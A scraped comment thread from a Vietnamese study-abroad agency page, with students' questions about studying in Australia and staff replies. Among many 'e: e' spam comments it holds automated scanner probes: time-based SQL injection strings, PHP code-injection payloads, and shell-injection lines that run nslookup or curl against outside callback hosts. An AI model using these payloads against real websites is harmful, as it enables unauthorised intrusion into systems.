  Vào lúc: 10/10/2023, 02:35:45
  e: e
  Vào lúc: 10/10/2023, 02:35:10
  e: e
  Vào lúc: 10/10/2023, 02:26:27
  e: e
  Vào lúc: 10/10/2023, 02:25:40
  e: 1????%2527%2522
  Vào lúc: 10/10/2023, 02:24:48
  e: @@FYFib
  Vào lúc: 10/10/2023, 02:24:48
  e: e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Vào lúc: 10/10/2023, 02:24:46
  e: 1'"
  Vào lúc: 10/10/2023, 02:24:46
  e: yMF9WSkk')) OR 714=(SELECT 714 FROM PG_SLEEP(15))--
  Vào lúc: 10/10/2023, 02:24:08
  e: SzPx5lAF') OR 581=(SELECT 581 FROM PG_SLEEP(15))--
  Vào lúc: 10/10/2023, 02:23:27
  e: nOkf51gx' OR 431=(SELECT 431 FROM PG_SLEEP(15))--
  Vào lúc: 10/10/2023, 02:22:46
  e: qPZ0xzPF'; waitfor delay '0:0:15' --
  Vào lúc: 10/10/2023, 02:22:04
  e: 1 waitfor delay '0:0:15' --
  Vào lúc: 10/10/2023, 02:21:38
  e: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Vào lúc: 10/10/2023, 02:21:08
  e: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Vào lúc: 10/10/2023, 02:20:23
  e: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Vào lúc: 10/10/2023, 02:19:36
  e: if(now()=sysdate(),sleep(15),0)
  Vào lúc: 10/10/2023, 02:18:55
  e: -1" OR 2+410-410-1=0+0+0+1 --
  Vào lúc: 10/10/2023, 02:18:12
  e: -1' OR 2+17-17-1=0+0+0+1 or 'VrThYVbB'='
  Vào lúc: 10/10/2023, 02:18:11
  e: -1' OR 2+685-685-1=0+0+0+1 --
  Vào lúc: 10/10/2023, 02:18:09
  e: -1 OR 2+161-161-1=0+0+0+1
  Vào lúc: 10/10/2023, 02:18:07
  e: -1 OR 2+483-483-1=0+0+0+1 --
  Vào lúc: 10/10/2023, 02:18:05
  e: JnY8mrH1
  Vào lúc: 10/10/2023, 02:18:04
  e: e
  Vào lúc: 10/10/2023, 02:17:11
  e: e
  Vào lúc: 10/10/2023, 02:16:31
  e: e
  Vào lúc: 10/10/2023, 02:15:26
  e: e
  Vào lúc: 10/10/2023, 02:14:45
  e: e
  Vào lúc: 10/10/2023, 01:59:58
  e: e
  Vào lúc: 10/10/2023, 01:59:28
  e: e
  Vào lúc: 10/10/2023, 01:58:17
  e: e
  Vào lúc: 10/10/2023, 01:58:14
  e: e
  Vào lúc: 10/10/2023, 01:58:10
  e: e
  Vào lúc: 10/10/2023, 01:58:08
  e: e
  Vào lúc: 10/10/2023, 01:57:12
  e: e
  Vào lúc: 10/10/2023, 01:56:22
  e: e
  Vào lúc: 10/10/2023, 01:55:44
  e: e
  Vào lúc: 10/10/2023, 01:54:58
  e: e
  Vào lúc: 10/10/2023, 01:54:20
  e: e
  Vào lúc: 10/10/2023, 01:52:53
  e: e
  Vào lúc: 10/10/2023, 01:50:37
  e: e
  Vào lúc: 10/10/2023, 01:49:25
  e: e
  Vào lúc: 10/10/2023, 01:48:46
  '.print(md5(31337)).': e
  Vào lúc: 10/10/2023, 01:48:44
  ${@print(md5(31337))}: e
  Vào lúc: 10/10/2023, 01:48:43
  ${@print(md5(31337))}\: e
  Vào lúc: 10/10/2023, 01:48:43
  ";print(md5(31337));$a=": e
  Vào lúc: 10/10/2023, 01:48:41
  ';print(md5(31337));$a=': e
  Vào lúc: 10/10/2023, 01:48:40
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));: e
  Vào lúc: 10/10/2023, 01:48:39
  ;(nslookup -q=cname hitguvfwqxykp1208a.bxss.me||curl hitguvfwqxykp1208a.bxss.me)|(nslookup -q=cname hitguvfwqxykp1208a.bxss.me||curl hitguvfwqxykp1208a.bxss.me)&(nslookup -q=cname hitguvfwqxykp1208a.bxss.me||curl hitguvfwqxykp1208a.bxss.me): e
  Vào lúc: 10/10/2023, 01:48:30
  e: e
  Vào lúc: 10/10/2023, 01:48:29
  `(nslookup -q=cname hitxwblxqkkzneec7d.bxss.me||curl hitxwblxqkkzneec7d.bxss.me)`: e
  Vào lúc: 10/10/2023, 01:48:29
  e: e
  Vào lúc: 10/10/2023, 01:48:28
  |(nslookup -q=cname hitdzilwdhecp4668f.bxss.me||curl hitdzilwdhecp4668f.bxss.me): e
  Vào lúc: 10/10/2023, 01:48:28
  &(nslookup -q=cname hityogdadokec23a19.bxss.me||curl hityogdadokec23a19.bxss.me)&'\"`0&(nslookup -q=cname hityogdadokec23a19.bxss.me||curl hityogdadokec23a19.bxss.me)&`': e
  Vào lúc: 10/10/2023, 01:48:25
  e: e
  Vào lúc: 10/10/2023, 01:48:24
  &nslookup -q=cname hitqpjbemvsfhf6621.bxss.me&'\"`0&nslookup -q=cname hitqpjbemvsfhf6621.bxss.me&`': e
  Vào lúc: 10/10/2023, 01:48:24
  e: e
  Vào lúc: 10/10/2023, 01:48:24
  $(nslookup -q=cname hityfpbgwsnmjb90c9.bxss.me||curl hityfpbgwsnmjb90c9.bxss.me): e
  Vào lúc: 10/10/2023, 01:48:22
  (nslookup -q=cname hitovebcurptpfa56c.bxss.me||curl hitovebcurptpfa56c.bxss.me)): e
  Vào lúc: 10/10/2023, 01:48:11
  e: e
  Vào lúc: 10/10/2023, 01:48:10
  e|echo gormjh$()\ txbfqw\nz^xyu||a #' |echo gormjh$()\ txbfqw\nz^xyu||a #|" |echo gormjh$()\ txbfqw\nz^xyu||a #: e
  Vào lúc: 10/10/2023, 01:48:10
  e: e
  Vào lúc: 10/10/2023, 01:48:10
  e9743215: e
  Vào lúc: 10/10/2023, 01:48:06
  e: e
  Vào lúc: 10/10/2023, 01:48:05
  |echo mefmrh$()\ wbgqzk\nz^xyu||a #' |echo mefmrh$()\ wbgqzk\nz^xyu||a #|" |echo mefmrh$()\ wbgqzk\nz^xyu||a #: e
  Vào lúc: 10/10/2023, 01:48:05
  '"()&%: e
  Vào lúc: 10/10/2023, 01:48:05
  &echo tvhwjr$()\ jjbpaq\nz^xyu||a #' &echo tvhwjr$()\ jjbpaq\nz^xyu||a #|" &echo tvhwjr$()\ jjbpaq\nz^xyu||a #: e
  Vào lúc: 10/10/2023, 01:48:00
  e'"()&%: e
  Vào lúc: 10/10/2023, 01:48:00
  e&echo qcqyje$()\ vpjmgl\nz^xyu||a #' &echo qcqyje$()\ vpjmgl\nz^xyu||a #|" &echo qcqyje$()\ vpjmgl\nz^xyu||a #: e
  Vào lúc: 10/10/2023, 01:48:00
  echo rkwgbr$()\ bstdto\nz^xyu||a #' &echo rkwgbr$()\ bstdto\nz^xyu||a #|" &echo rkwgbr$()\ bstdto\nz^xyu||a #: e
  Vào lúc: 10/10/2023, 01:47:59
  e: e
  Vào lúc: 10/10/2023, 01:47:59
  e: e
  Vào lúc: 10/10/2023, 01:47:58
  e: e
  Vào lúc: 10/10/2023, 01:47:58
  e: e
  Vào lúc: 10/10/2023, 01:47:58
  e: e
  Vào lúc: 10/10/2023, 01:47:58
  e: e
  Vào lúc: 10/10/2023, 01:47:57
  e: e
  Vào lúc: 10/10/2023, 01:47:56
  e: e
  Vào lúc: 10/10/2023, 01:47:56
  e: e
  Vào lúc: 10/10/2023, 01:47:55

  e: e
  Vào lúc: 17/10/2022, 06:21:53
  e: e
  Vào lúc: 03/10/2022, 12:50:37
  e: e
  Vào lúc: 03/10/2022, 02:55:22
  e: e
  Vào lúc: 03/10/2022, 01:03:03
  e: e
  Vào lúc: 02/10/2022, 15:36:09
  info@megastudy.edu.vn: Chào em, e chuyển tiếp sang úc học thì lúc ra trường vẫn lấy bằng từ trường ở Úc cấp nên xin việc làm vẫn không có gì bất lợi em ạ. Còn về cơ hội định cư thì không phải phụ thuộc vào bậc cử nhân hay thạc sĩ mà nó phụ thuộc các yếu tố như ngành em chọn học có nằm trong danh sách ưu tiên định cư không, vùng em chọn ở lại có bị cạnh tranh nhiều không, và cả năng lực của em nữa.
  Vào lúc: 04/05/2022, 09:32:07
 • Việt: dạ em có thắc mắc , em đã hoàn thành xong chương trình đại học tại VN ; nhưng em có nguyện vọng sang Úc học lại bậc cao đẳng và cao đẳng nâng cao ở Úc và tiến đến thường trú dân ko biết có đc không , xin vui lòng giải đáp thắc mắc giúp em ạ ???
  Vào lúc: 29/12/2021, 00:13:07 - Trả lời

  e: e
  Vào lúc: 10/10/2023, 01:25:29
  e: e
  Vào lúc: 17/10/2022, 06:21:56
  e: e
  Vào lúc: 03/10/2022, 12:51:09
  e: e
  Vào lúc: 03/10/2022, 01:03:34
  info@megastudy.edu.vn: Chào em, Megastudy sẽ liên hệ để tư vấn chi tiết dựa trên hồ sơ của em nhé.
  Vào lúc: 29/12/2021, 09:33:51
 • Linh: Dạ em chào ad, năm nay là năm 2021 em đang là sinh viên năm nhất ở Việt Nam, em muốn đi du học Úc vào đầu năm 2022 thì em có thể đi theo lộ trình nào ạ. Em cảm ơn ad Chúc ad buổi tối tốt lành!
  Vào lúc: 03/05/2021, 18:56:55 - Trả lời

  e: e
  Vào lúc: 10/10/2023, 01:25:43
  e: e
  Vào lúc: 17/10/2022, 06:22:00
  e: e
  Vào lúc: 03/10/2022, 12:51:10
  e: e
  Vào lúc: 03/10/2022, 01:03:35
  info@megastudy.edu.vn: Hi em, Em có thể du học Úc bậc đại học theo chuyên ngành em đang học, trường hợp này em sẽ chọn 1 số trường công nhận tín chỉ học của trường em đang theo học. Hoặc em có thể học lại bậc đại học từ đầu với 1 chuyên ngành khác nhé.
  Vào lúc: 29/12/2021, 09:34:55
 • nhi: đối với THPT liệu có bị trừ điểm visa khi bị fail 1 môn học không ạ
  Vào lúc: 23/03/2021, 10:50:16 - Trả lời

  e: e
  Vào lúc: 10/10/2023, 01:25:42
  e: e
  Vào lúc: 17/10/2022, 06:22:03
  e: e
  Vào lúc: 03/10/2022, 12:51:12
  e: e
  Vào lúc: 03/10/2022, 01:03:37
  info@megastudy.edu.vn: Chào em, việc fail môn học cũng có thể ảnh hưởng 1 phần đến việc đánh giá của trường đối với hồ sơ của em, nhưng nếu nó không ảnh hưởng đến kết quả học tập của em nhiều quá (GPA vẫn ở mức khá) thì tỷ lệ visa cũng không ảnh hưởng nhé.
  Vào lúc: 23/03/2021, 13:59:45
 • Hồ Thị Thúy Vy: cho em hỏi nếu 3 năm học cấp 3 học lực đều trung bình ,hiện chưa có chứng chỉ tiếng anh thì có đi du học úc được không ạ Mong chị trả lời sớm nhất có thể
  Vào lúc: 30/01/2021, 17:50:14 - Trả lời

  e: e
  Vào lúc: 10/10/2023, 01:25:53
  e: e
  Vào lúc: 17/10/2022, 06:22:06
  e: e
  Vào lúc: 03/10/2022, 12:51:14
  e: e
  Vào lúc: 03/10/2022, 01:03:38
  info@megastudy.edu.vn: Chào em, hồ sơ của em vẫn đi du học được tuy nhiên nên có chứng chỉ Ielts tối thiểu 5.0 để nâng cao tỷ lệ thành công visa nhé.
  Vào lúc: 05/02/2021, 09:01:11
 • Linh Vy: Chào anh chị. Cho em hỏi là: Em bị hạnh kiểm trung bình ở lớp 11 và học lực khá thì có đi du học không ạ? Năm lớp 12 em đạt loại giỏi nhưng em rất lo khi bị vướng lớp 11 ạ. Mong anh chị tư vấn giúp em. Em cám ơn!!!
  Vào lúc: 11/01/2021, 18:51:32 - Trả lời

  e: e
  Vào lúc: 10/10/2023, 01:25:53
  e: e
  Vào lúc: 17/10/2022, 06:22:09
  e: e
  Vào lúc: 03/10/2022, 12:51:15
  e: e
  Vào lúc: 03/10/2022, 01:03:40
 • Linh: Em hiện tại đã tốt nghiệp cấp 3 nhưng không đi học đại học và chưa có chứng chi ielts. e có nguyện vọng đi du học nghề bên úc bây giờ e chỉ cần thi chứng chỉ ielts thôi đúng không ạ hay cần có điều kiện gì nữa ạ.
  Vào lúc: 31/10/2020, 11:30:34 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:12
  e: e
  Vào lúc: 03/10/2022, 12:51:17
  e: e
  Vào lúc: 03/10/2022, 01:03:41
  info@megastudy.edu.vn: Chào em, quan trọng là em đã tốt nghiệp lâu chưa? Nếu Gap year của em quá lớn thì cũng ảnh hưởng đến tỷ lệ visa nhé, Megastudy sẽ liên hệ tư vấn thêm cho em.
  Vào lúc: 02/11/2020, 09:34:07
 • Thanh Hương: em muốn hỏi page một vấn đề ạ nếu em học xong năm nhất đại học việt nam rồi chuyển sang đại học ở Aus thì sẽ xét GPA năm nhất đại học hay GPA cấp 3 ạ?
  Vào lúc: 28/04/2020, 23:14:53 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:15
  e: e
  Vào lúc: 03/10/2022, 12:51:18
  e: e
  Vào lúc: 03/10/2022, 01:03:43
  info@megastudy.edu.vn: Chào em, trường hợp của em học xong năm nhất đại học ở Việt Nam thì đi Úc du học bậc cử nhân, vậy họ sẽ xét GPA của năm lớp 12 em nhé.
  Vào lúc: 29/04/2020, 09:51:26
 • Đặng Nhật Hạ: Cho em hỏi, nếu e theo học cao đẳng/ chứng chỉ nghề 6-1năm thì thời gian em được ở lại là bao lâu ạ?
  Vào lúc: 19/04/2020, 14:44:05 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:17
  e: e
  Vào lúc: 03/10/2022, 12:51:20
  e: e
  Vào lúc: 03/10/2022, 01:03:45
  info@megastudy.edu.vn: Chào em, em có thể ở lại tối thiểu 2 năm sau tốt nghiệp nhé.
  Vào lúc: 20/04/2020, 09:37:50
 • Thảo: Chào anh/chị, cho em hỏi là em muốn học khoá học thạc sĩ 1.5 năm, thì e có thể ở lại Úc sau khi học là bao lâu ạ. Em cám ơn anh/chị.
  Vào lúc: 11/04/2020, 12:54:53 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:20
  e: e
  Vào lúc: 03/10/2022, 12:51:21
  e: e
  Vào lúc: 03/10/2022, 01:03:46
  info@megastudy.edu.vn: Chào em, em sẽ được phép ở lại 2 năm sau tốt nghiệp. Trường hợp em học tại các trường ở khu vực Regional thì thời gian ở lại sẽ được cộng thêm 1-2 năm nữa, tức là tối đa 4 năm sau tốt nghiệp em nhé.
  Vào lúc: 13/04/2020, 09:47:57
 • Ngô Thanh Thuỷ: Em chào chị ạ em muốn hỏi bên mình một vài vấn đề Thứ 1 em là học sinh lớp 11 và năm 2019 em có nộp đơn xin visa của úc nhưng bị từ chối Thứ 2 hiện tại em đang học Ielts để hồ sơ đẹp lên ạ Em muốn hỏi là với cấp THPT ở úc thì ielts cần đạt bao nhiêu ạ
  Vào lúc: 10/04/2020, 15:13:24 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:23
  e: e
  Vào lúc: 03/10/2022, 12:51:23
  e: e
  Vào lúc: 03/10/2022, 01:03:48
  info@megastudy.edu.vn: Chào em, em cần căn cứ vào lý do bị từ chối visa năm 2019 để từ đó biết được mình cần khắc phục hồ sơ ở đâu. Theo quy định thì du học bậc THPT không cần có ielts em nhé, nhưng nếu để đảm bảo visa thì em có thể cố gắng có tối thiểu 5.0 ielts. Chúc em thành công.
  Vào lúc: 13/04/2020, 09:53:16
 • hongmy10112003: Em giờ đang học lớp 11 ạ em giờ mới có ý định du học c3 ở úc nhưng mãi đến t9 năm sau em mới học xong khóa học để thi IELTS em đang phân vân mấy vấn đề ạ - Nếu em chỉ học xong lớp 12 không thi tốt nghiệp nếu thi đc 5.0 thì không sao nhưng nếu không thi được em lại phải đợi để thi lại em sợ đợi thi xong rồi + việc đợi thời gian làm thủ tục visa... Em sợ muộn thời gian học đợi năm sau thì lại quá tuổi - Em thi thpt quốc gia xong rồi nếu thi được cả IELTS thì có được học lại c3 bên Úc ko ạ?? - Với cả mãi em thấy phải có người giám hộ mà đến t11-2021 em mới 18t mà t1-2021 trường c3 bên Úc mới khai giảng thì em ko cần ng giám hộ nữa đc ko ạ ?? Hay là để ko cần ng giám hộ em phải đợi đến lúc sinh nhật mới làm thủ tục ko cần ng giám hộ ( em sợ ko kịp để nhập học ý ạ )
  Vào lúc: 12/03/2020, 20:28:02 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:26
  e: e
  Vào lúc: 03/10/2022, 12:51:24
  e: e
  Vào lúc: 03/10/2022, 01:03:49
  info@megastudy.edu.vn: Chào em, về câu hỏi của em Megastudy sẽ liên hệ tư vấn cụ thể nhé.
  Vào lúc: 13/03/2020, 14:12:53
 • sanmyphamtot: Du hoc có được đi làm thêm không chị? Để chủ động tài chính hơn ạ.Em cảm ơn
  Vào lúc: 24/02/2020, 15:05:01 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:31
  e: e
  Vào lúc: 03/10/2022, 12:51:27
  e: e
  Vào lúc: 03/10/2022, 01:03:52
  info@megastudy.edu.vn: Chào em, du học sinh tại Úc được phép đi làm thêm theo quy định là 40h/ 2 tuần nhé.
  Vào lúc: 25/02/2020, 09:21:32
 • Kem: Em đang học Bác sĩ đa khoa ở trường ĐH Y dược. Mà e muốn đổi ngành và du học thì có dễ dàng k ạ. Học lực cấp 3 em khá giỏi. Điểm 12 cũng rất cao và điểm thi ĐH cũng cao ạ
  Vào lúc: 12/02/2020, 14:36:29 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:34
  e: e
  Vào lúc: 03/10/2022, 12:51:28
  e: e
  Vào lúc: 03/10/2022, 01:03:53
  info@megastudy.edu.vn: Chào em, thông thường đi du học Úc đổi ngành không có vấn đề gì em nhé.
  Vào lúc: 13/02/2020, 09:15:05
 • Lê phương thảo: Chào chị . Em năm nay học lớp 11 . Hiện tại kết quả học tập của em từ lớp 6 đến học kỳ 1 vừa rồi chỉ đạt loại khá . E vẫn đang trong quá trình học ielts , vào tháng 7 năm nay e sẽ thi . Vậy cho e hỏi nếu kết quả học lực chỉ đạt loại khá và e muốn xin học bổng tại Úc có khó ko ạ ? Học bạ c3 có ảnh hưởng đến vc xin học bổng ko ạ
  Vào lúc: 12/01/2020, 15:48:46 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:37
  e: e
  Vào lúc: 03/10/2022, 12:51:30
  e: e
  Vào lúc: 03/10/2022, 01:03:55
  info@megastudy.edu.vn: Chào em, học bổng tại Úc họ sẽ xét trên kết quả học tập của năm học cấp 3, nhưng quan trọng nhất là lớp 12 em nhé, ngoài ra họ có thể căn cứ vào điểm ielts của em nữa nên em cứ cố gắng đạt kết quả tốt nhất có thể nhé.
  Vào lúc: 14/01/2020, 09:53:14
 • Nguyễn thi Kieu thu: Cho em hỏi , con em mới học 12 xong nhưng năm lớp 11 diêm trung bình, có 1 môn bị yếu em muốn đi du học Úc hệ đại học , hiện nay đang có bằng ielts 4,5 khả năng đi dc k ạ
  Vào lúc: 13/11/2019, 15:11:44 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:39
  e: e
  Vào lúc: 03/10/2022, 12:51:31
  e: e
  Vào lúc: 03/10/2022, 01:03:57
  info@megastudy.edu.vn: Chào chị, thực tế thì chứng chỉ 4,5 cũng vẫn có tỷ lệ bị từ chối visa, điểm tb học tập thường sẽ quan trọng nhất là năm lớp 12 nhé. Megastudy sẽ liên hệ tư vấn cụ thể cho chị.
  Vào lúc: 14/11/2019, 09:39:49
 • Ngô Sỹ Ngọc: Anh chị cho em hỏi là thời gian của trường bên kia chấp nhận đơn xin nhập học của mình là bao lâu ạ Em gửi đơn vào 1 trường nghề ạ.
  Vào lúc: 29/09/2019, 20:25:54 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:42
  e: e
  Vào lúc: 03/10/2022, 12:51:33
  e: e
  Vào lúc: 03/10/2022, 01:03:58
  info@megastudy.edu.vn: Chào em, tùy từng trường tại Úc sẽ có thời gian xét duyệt cấp thư mời khác nhau, nhưng thông thường sẽ dao động từ 2 ngày - 2 tuần em nhé.
  Vào lúc: 30/09/2019, 10:31:00
 • Nguyễn thị như quỳnh: Chị ơi cho e hỏi e năm này lên 12 mà e có ý định học hết 12 rồi đi du học úc, từ lớp1 -11 e đều đạt học lực giỏi và chưa có chứng chỉ ielts thì thế nào ạ
  Vào lúc: 15/08/2019, 10:46:59 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:46
  e: e
  Vào lúc: 03/10/2022, 12:51:34
  e: e
  Vào lúc: 03/10/2022, 01:04:00
  info@megastudy.edu.vn: Chào em, đi du học Úc hiện tại em nên có ielts tối thiểu 5.0 để có tỷ lệ visa tốt, Megastudy sẽ liên hệ tư vấn cho em nhé.
  Vào lúc: 16/08/2019, 11:04:41
 • dead raccoon: Chào các admin, cho em hỏi em có thể chụp hình passport và xin visa Úc khi đội tóc giả không ạ? em bị chứng trichotillomania nên tóc không nhiều và phải đội tóc giả mỗi ngày. em cảm ơn ạ
  Vào lúc: 22/07/2019, 23:22:41 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:48
  e: e
  Vào lúc: 03/10/2022, 12:51:36
  e: e
  Vào lúc: 03/10/2022, 01:04:01
  info@megastudy.edu.vn: Chào em, em có thể đội tóc giả khi chụp ảnh miễn là tóc k trùm tai, k che trán và các đặc điểm thông thường của khuôn mặt em nhé.
  Vào lúc: 23/07/2019, 09:26:45
 • Nguyễn Hữu Long: Ad ơi, chị em đag cs ý định sang du hk ở úc. Chuẩn bị mọi thứ r nhưng phỏng vấn vía thì lại bị trượt. Liệu chị e còn sang úc học đk nx k ạ
  Vào lúc: 15/01/2019, 21:38:48 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:51
  e: e
  Vào lúc: 03/10/2022, 12:51:37
  e: e
  Vào lúc: 03/10/2022, 01:04:03
  info@megastudy.edu.vn: Chào em, nếu biết lý do đưa ra từ phía lãnh sự thì có lẽ vẫn còn cơ hội làm lại visa lần tới em nhé. Chúc chị em đạt được mong muốn.
  Vào lúc: 22/02/2019, 11:48:13
 • Ngọc: Ad ơi cho mình hỏi: khóa dự bị thạc sĩ ở Úc thường tốn khoảng bao nhiêu tiền vậy bạn? Cần gấp câu TL Từ ad!!!
  Vào lúc: 09/01/2019, 11:41:51 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:54
  e: e
  Vào lúc: 03/10/2022, 12:51:39
  e: e
  Vào lúc: 03/10/2022, 01:04:05
  Ngoc Do: còn tùy trường bạn nhé. Cần thì bạn có thể thảo luận qua email với mình
  Vào lúc: 22/02/2019, 08:07:23
  info@megastudy.edu.vn: Chào bạn. Du học thạc sĩ tại Úc sẽ tùy trường mà có học phí dao động 1 năm khoảng 17.000-36.000AUD/ sinh hoạt phí khoảng 18.000 -21.000AUD bạn nhé.
  Vào lúc: 09/01/2019, 14:33:32
 • Hoang An: cho em hỏie tốt nghiệp thpt năm 2015 và chỉ ở nhà cho đến nay và có ielts 6.0 liệu đi du học úc đc k ạ?
  Vào lúc: 01/12/2018, 03:05:52 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:22:57
  e: e
  Vào lúc: 17/10/2022, 06:22:57
  e: e
  Vào lúc: 03/10/2022, 12:51:40
  e: e
  Vào lúc: 03/10/2022, 01:04:07
  info@megastudy.edu.vn: Chào em, được em nhé, miễn là em có giải trình hợp lý về kế hoạch học tập của em.
  Vào lúc: 01/12/2018, 10:11:09
 • Lâm: Em học lớp 12, năm sau em thi tốt nghiệp và đang có dự định học ngành quản trị nhà hàng khách sạn và du lịch ở Úc. Em học các môn tự nhiên rất yếu nên điểm trung bình không cao vậy lúc xét học bạ có ảnh hưởng nhiều không ạ? Em đã có IELTS 6.0 ạ. Với lại cho em hỏi là điểm thi tốt nghiệp các môn cần tối thiểu bao nhiêu điểm ạ?
  Vào lúc: 29/11/2018, 22:10:13 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:01
  e: e
  Vào lúc: 17/10/2022, 06:22:59
  e: e
  Vào lúc: 03/10/2022, 12:51:42
  e: e
  Vào lúc: 03/10/2022, 01:04:08
  info@megastudy.edu.vn: Chào em, điểm GPA chỉ cần em duy trì ở mức TB khá trở lên là tỷ lệ visa sẽ không ảnh hưởng nhé. Điểm thi tốt nghiệp cũng không quá ảnh hưởng, chỉ cần em cố gắng đạt loại khá là ok em ạ.
  Vào lúc: 30/11/2018, 10:03:09
 • Phạm Nguyễn Nhật Quang: Cho em hỏi , hiện em đang đi làm 24 tuổi em muốn đi du học tại ÚC tại trường Tafe South Bank Brisbane. Em đang có người nhà bên ÚC mong được ty7 vấn.
  Vào lúc: 15/05/2018, 14:53:37 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:03
  e: e
  Vào lúc: 17/10/2022, 06:23:02
  e: e
  Vào lúc: 03/10/2022, 12:51:43
  e: e
  Vào lúc: 03/10/2022, 01:04:10
  info@megastudy.edu.vn: Hi em, tư vấn Úc sẽ liên hệ với em em nhé!
  Vào lúc: 19/05/2018, 08:46:06
 • cao thanh tú: cho em hỏi là sơ yêu lý lịch mình cần làm sơ yêu lý lịch thư pháp hay lý lịch bình thường ở xã , phường công chứng
  Vào lúc: 05/04/2018, 10:16:01 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:06
  e: e
  Vào lúc: 17/10/2022, 06:23:06
  e: e
  Vào lúc: 03/10/2022, 12:51:45
  e: e
  Vào lúc: 03/10/2022, 01:04:11
  info@megastudy.edu.vn: Hi Tú, Megastudy sẽ liên hệ lại để tư vấn sớm cho em nhé!
  Vào lúc: 07/04/2018, 09:35:51
 • Nguyễn Ân: Chào ad, hiện tại em gái em đã sắp học xong lớp 10, muốn du học Úc, vậy sẽ học lại lớp 10 hay tiếp 11 ạ?
  Vào lúc: 30/03/2018, 09:30:17 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:09
  e: e
  Vào lúc: 17/10/2022, 06:23:09
  e: e
  Vào lúc: 03/10/2022, 12:51:47
  e: e
  Vào lúc: 03/10/2022, 01:04:13
  info@megastudy.edu.vn: Chào em, em sẽ tiếp tục học các chương trình dự bị đại học hoặc các chương trình học chuyển tiếp khác nhé
  Vào lúc: 31/03/2018, 09:12:52
 • Bui thi phuong nhi: Cho em hỏi vậy khi e qua úc học khi e đậu tốt nghiệp rồi thì sẽ học ĐH hay sẽ học ra sao ạ.. có thể tư vấn giúp em không ạ?
  Vào lúc: 09/03/2018, 09:33:32 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:12
  e: e
  Vào lúc: 17/10/2022, 06:23:11
  e: e
  Vào lúc: 03/10/2022, 12:51:48
  e: e
  Vào lúc: 03/10/2022, 01:04:14
  info@Megastudy.edu.cn: Chào em, em từng liên hệ với Mrgastudy rồi phải không, em nhận được mail tư vấn rồi chứ? Megatsudy sẽ liên hệ lại với em để giải đáp thắc mắc mới của em nhé!
  Vào lúc: 14/03/2018, 11:12:04
 • Lê Hoàng Diệu: Chào chị, em là học sinh tốt nghiệp 12 với bằng bổ túc thôi ạ, hiện em đang theo học nghề, nhưng trong quá trình học có vài vấn đề xãy ra, nếu em làm hồ sơ du học, không có bằng trung cấp nghề, chỉ với bằng tốt nghiệp bổ túc vài bằng ielts 6.5 thì có được xét không ạ, em cám ơn ạ
  Vào lúc: 05/03/2018, 23:59:47 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:15
  e: e
  Vào lúc: 17/10/2022, 06:23:14
  e: e
  Vào lúc: 03/10/2022, 12:51:50
  e: e
  Vào lúc: 03/10/2022, 01:04:16
  info@megastudy.edu.vn: Chào Hoàng Diệu, em đợi check mail tư vấn từ Megastudy em nhé!
  Vào lúc: 06/03/2018, 09:50:10
 • Bùi Thị Phương Nhi: Hiện tại e đang học 12, sắp tới e sẽ thi ĐH .em đang phân vân không biết em hoc để đậu ĐH ( trường nào cũng được) hay là em phải đậu trường danh tiếng ở VN thì e có thể qua Úc tiếp tục học ĐH ạ..và khi đậu ĐH em có cần học ĐH để lấy bảng điêmt không? Tư vấn giúp em ạ.. Em vẫn chưa có bằng ielts, sắp tới e sẽ học và thi ielts .
  Vào lúc: 27/02/2018, 23:33:53 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:17
  e: e
  Vào lúc: 17/10/2022, 06:23:17
  e: e
  Vào lúc: 03/10/2022, 12:51:52
  e: e
  Vào lúc: 03/10/2022, 01:04:17
  info@megastudy.edu.vn: Không cần phải là đại học danh tiếng ở VN mới đc đi du học em nhé, có nhiều chương trình du học tại Úc dành cho em, em chỉ cần tốt nghiệp thpt với bảng điểm tương đối và có ielts phù hợp là đã có cơ hội đậu visa rồi! Megastudy sẽ gửi lại thông tin chi tiết vào mail cho em nhé!
  Vào lúc: 28/02/2018, 09:42:33
 • tran kim thoa: cho em hỏie lớp 12 bài test tiếng anh khi đi du học có khó ko
  Vào lúc: 18/01/2018, 18:43:09 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:20
  e: e
  Vào lúc: 17/10/2022, 06:23:20
  e: e
  Vào lúc: 03/10/2022, 12:51:53
  e: e
  Vào lúc: 03/10/2022, 01:04:19
  Vi Vi: Em cũng đang quan tâm vấn đề này ạ
  Vào lúc: 21/03/2018, 22:01:08
  info@megastudy.edu.vn: Chào em, thông thường em cần có chứng chỉ tiếng anh quốc tế để được cháp nhận đủ điều kiện nhập học tại các trương như ielts, tuy nhiên có trường hợp có thể làm bài test của trường, tư vấn sẽ liên hệ để thông tin cụ thể cho em
  Vào lúc: 19/01/2018, 16:30:59
